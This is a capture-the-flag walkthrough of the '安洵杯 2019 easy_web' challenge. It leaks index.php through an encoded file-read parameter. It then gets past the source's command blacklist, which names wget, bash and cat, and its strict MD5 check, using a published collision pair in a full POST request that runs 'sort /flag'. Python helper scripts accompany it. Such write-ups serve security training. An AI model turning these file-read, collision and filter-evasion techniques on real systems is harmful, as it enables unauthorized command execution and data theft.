[安洵杯 2019] easy_web detailed walkthrough
Challenge: https://www.nssctf.cn/problem/732
Solution steps
Start the environment; the landing link is http://node4.anna.nssctf.cn:28200/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
1️⃣ cmd points straight at command execution. There is a WAF, and the obvious payloads fail. TXpVek5UTTFNbVUzTURabE5qYz0 looks suspicious; decoding it (base64 -> base64 -> hex) gives 555.png. Requesting http://node4.anna.nssctf.cn:28200/555.png returns a base64-encoded image, and base64-decoding that only yields binary garbage (the image bytes themselves).
2️⃣ img is a GET parameter and it is encoded, so encode flag.php with the reverse logic (hex -> base64 -> base64) and request it: the page prints “xixi~ no flag”. No luck.
3️⃣ Encode index.php the same way, which gives TmprMlpUWTBOalUzT0RKbE56QTJPRGN3, and visit http://node4.anna.nssctf.cn:28200/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=. Open F12, copy the image's base64 data and decode it: the result is the source of index.php. Next, code audit:
<?php
// E_ALL || ~E_NOTICE is a boolean OR, so this is error_reporting(1): only E_ERROR is reported
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img: base64 -> base64 -> hex gives the file name
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
// everything outside [a-zA-Z0-9.] is stripped, so no "/" survives: only files in the web root are reachable
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    // arbitrary file read: the file content comes back as a base64 data URI
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
// cmd is reflected back unescaped
echo $cmd;
echo "<br>";
// case-insensitive command blacklist; note that sort is not on it
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // (string) casts plus !== and === : only a genuine MD5 collision with different bytes passes
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
    background:url(./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
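The img handling from steps 1 to 3 and from the source above, as an added Python example (my code, not from the original post or the challenge): it implements both directions of the hex -> base64 -> base64 scheme, tolerates the dropped '=' padding that PHP's base64_decode accepts, and mirrors the server's preg_replace filter and the flag check, so a candidate file name can be tested offline before it is sent. All token values are derived from the scheme itself; nothing here contacts the target.

```python
import base64
import re
from typing import Optional


def encode_img(filename: str) -> str:
    """hex -> base64 -> base64: produce a value for ?img= that index.php decodes back to filename."""
    hex_name = filename.encode("utf-8").hex().encode("ascii")
    return base64.b64encode(base64.b64encode(hex_name)).decode("ascii")


def _b64decode_lenient(s: str) -> bytes:
    # PHP's base64_decode() accepts input without '=' padding (the challenge URL ships
    # TXpVek5UTTFNbVUzTURabE5qYz0 with its trailing '=' dropped); Python's does not, so restore it.
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(token: str) -> str:
    """base64 -> base64 -> hex, i.e. hex2bin(base64_decode(base64_decode($_GET['img'])))."""
    hex_name = _b64decode_lenient(_b64decode_lenient(token).decode("ascii")).decode("ascii")
    return bytes.fromhex(hex_name).decode("utf-8")


def server_file(token: str) -> Optional[str]:
    """Mirror the rest of index.php: strip everything outside [a-zA-Z0-9.], then refuse any
    name containing 'flag' (case-insensitive). Returns the name file_get_contents() would
    receive, or None for the 'xixi~ no flag' branch."""
    name = re.sub(r"[^a-zA-Z0-9.]+", "", decode_img(token))
    if re.search(r"flag", name, re.IGNORECASE):
        return None
    return name


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))  # 555.png
    # Candidate names are constructed for illustration; '/' never survives the filter,
    # which is why path traversal out of the web root is not an option here.
    for candidate in ("index.php", "flag.php", "../flag.php", "../../etc/passwd"):
        token = encode_img(candidate)
        print(f"{candidate:18} -> {token:36} -> {server_file(token)}")
```

The traversal case is the practical check: "../../etc/passwd" reaches file_get_contents() as "....etcpasswd", so only files sitting next to index.php are readable, and anything with "flag" in its name is refused before the read.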
4️⃣ Key code review: the MD5 comparison is a strict one
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
Both POST values are cast to (string) and compared with !== and ===, so array tricks and 0e "magic" hashes are out: a and b must be a genuine MD5 collision pair whose bytes differ, which is what the request below carries. The blacklist blocks cat, tac, head, tail, nl, more, less, od, grep and friends, but not sort, so send the request with Burp using cmd=sort /flag. The reference writeup also lists ca\t /flag; note that the pattern as printed above also contains a literal backslash ("\\|\\\\" in a PHP double-quoted string becomes the PCRE text \|\\), so verify that variant against the live target. See the references for the exact steps.
POST /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=sort%20/flag HTTP/1.1
Host: node4.anna.nssctf.cn:28200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 307
Origin: http://node4.anna.nssctf.cn:28200
Connection: close
Referer: http://node4.anna.nssctf.cn:28200/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=l\s
Upgrade-Insecure-Requests: 1
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
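The gate from step 4, as an added Python example (my code, not from the original post or the challenge): it reproduces the cmd blacklist as the PCRE engine sees it after PHP's double-quoted-string escaping, checks that the two POST values from the Burp request above are a genuine MD5 collision, and rebuilds the percent-encoded body byte for byte. The two 64-byte blocks are the published single-block MD5 collision pair that the request carries; the command strings tried at the bottom are constructed for illustration.

```python
import hashlib
import re
from urllib.parse import quote_from_bytes, unquote_to_bytes

# The cmd blacklist from index.php, written as PCRE sees it after PHP has processed the
# double-quoted string: "\\|\\\\" becomes \|\\ (a literal pipe and a literal backslash),
# "\'" stays \' and "\"" becomes ". The duplicated alternatives have been dropped.
CMD_BLACKLIST = re.compile(
    r"ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless"
    r"|pcre|paste|diff|file|echo|sh"
    r"|'|\"|`|;|,|\*|\?|\||\\|\n|\t|\r|\xA0|\{|\}|\(|\)|&[^\d]|@|\$|\[|\]|-|<|>",
    re.IGNORECASE,
)


def cmd_forbidden(cmd: str) -> bool:
    """True when index.php would answer 'forbid ~' for this value of ?cmd=."""
    return CMD_BLACKLIST.search(cmd) is not None


# The two 64-byte blocks carried as a= and b= in the request above, as hex.
# They are the well-known published MD5 collision pair; they differ in exactly two bytes.
COLLISION_A = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2"
)
COLLISION_B = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2"
)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def differing_bytes(a: bytes, b: bytes) -> int:
    """Number of byte positions at which the two inputs differ."""
    return sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))


def md5_check_passes(a: bytes, b: bytes) -> bool:
    """Mirror of (string)$a !== (string)$b && md5($a) === md5($b). Because of the string
    casts and the strict operators, neither arrays nor 0e 'magic' hashes help here;
    only a real collision between different byte strings passes."""
    return a != b and md5_hex(a) == md5_hex(b)


def build_post_body(a: bytes, b: bytes) -> str:
    """Percent-encode the raw bytes for application/x-www-form-urlencoded; this reproduces
    the a=...&b=... body of the request above exactly (307 bytes)."""
    return "a=" + quote_from_bytes(a, safe="") + "&b=" + quote_from_bytes(b, safe="")


def parse_post_body(body: str) -> dict:
    """Decode a form body back to raw bytes, as PHP does when it fills $_POST."""
    return {k: unquote_to_bytes(v) for k, v in (p.split("=", 1) for p in body.split("&"))}


def gate_open(cmd: str, a: bytes, b: bytes) -> bool:
    """Both conditions index.php imposes before it executes `$cmd`."""
    return not cmd_forbidden(cmd) and md5_check_passes(a, b)


if __name__ == "__main__":
    body = build_post_body(COLLISION_A, COLLISION_B)
    print(len(body), body[:48] + "...")
    print("collision:", md5_check_passes(COLLISION_A, COLLISION_B), md5_hex(COLLISION_A))
    for cmd in ("sort /flag", "cat /flag", "ca\\t /flag", "ls", "sort /flag | id"):
        print(f"{cmd!r:20} forbidden={cmd_forbidden(cmd)} gate_open={gate_open(cmd, COLLISION_A, COLLISION_B)}")
```

The body must be sent as raw percent-encoded bytes (as Burp does); pasting the blocks as text would mangle the 0x00 and the high bytes, and the (string) casts then compare two corrupted strings instead of the collision pair.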
Scripts
Decoding the base64 data-URI image
# -*- coding:utf-8 -*-
# @Time: 2023-10-01 19:35
# @Author: zer01
# @File:main.py
# @Description: https://blog.csdn.net/mouday/article/details/93489508
import base64
import re

def decode_image(file):
    with open(file) as f:
        # 1. Extract the MIME type and the base64 payload from the data URI; restricting the
        #    payload to base64 alphabet characters keeps trailing HTML (e.g. '></img>) out of it
        result = re.search(r"data:image/(?P<ext>.+?);base64,(?P<data>[A-Za-z0-9+/=]+)", f.read())
    if not result:
        raise Exception("Do not parse!")
    ext = result.group("ext")
    # print(ext)
    data = result.group("data")
    # 2. base64-decode; here the payload is the PHP source of index.php, so decode it as UTF-8 text
    img = base64.b64decode(data).decode('utf-8')
    # 3. Print the decoded result
    print(img)
    return img

if __name__ == '__main__':
    filename = 'base64_img.txt'
    decode_image(filename)
Decoding (base64 -> base64 -> hex)
# -*- coding:utf-8 -*-
# @Time: 2023-10-01 19:35
# @Author: zer01
# @File:main.py
# @Description:
import base64

def b64decode_padding(encoded_data):
    # Restore the '=' padding that was dropped (PHP's base64_decode does not need it, Python's does);
    # -len % 4 adds nothing when the length is already a multiple of 4
    encoded_data += '=' * (-len(encoded_data) % 4)
    return base64.b64decode(encoded_data).decode('utf-8')

def hexdecode(hex_string):
    return bytes.fromhex(hex_string).decode('utf-8')

if __name__ == '__main__':
    token = "TXpVek5UTTFNbVUzTURabE5qYz0"
    step1 = b64decode_padding(token)
    print(step1)
    step2 = b64decode_padding(step1)
    print(step2)
    step3 = hexdecode(step2)
    print(step3)
# MzUzNTM1MmU3MDZlNjc=
# 3535352e706e67
# 555.png
Encoding (hex -> base64 -> base64)
# -*- coding:utf-8 -*-
# @Time: 2023-10-01 19:35
# @Author: zer01
# @File:main.py
# @Description:
import base64

name = "index.php"
step1 = bytes(name, 'utf-8').hex()
print(step1)
step2 = base64.b64encode(step1.encode('utf-8')).decode('utf-8')
print(step2)
step3 = base64.b64encode(step2.encode('utf-8')).decode('utf-8')
print(step3)
# 696e6465782e706870
# Njk2ZTY0NjU3ODJlNzA2ODcw
# TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
References
[安洵杯 2019] easy_web: https://blog.csdn.net/qq_64201116/article/details/126093234
Summary of command-execution bypass techniques: https://blog.csdn.net/m0_64815693/article/details/127268809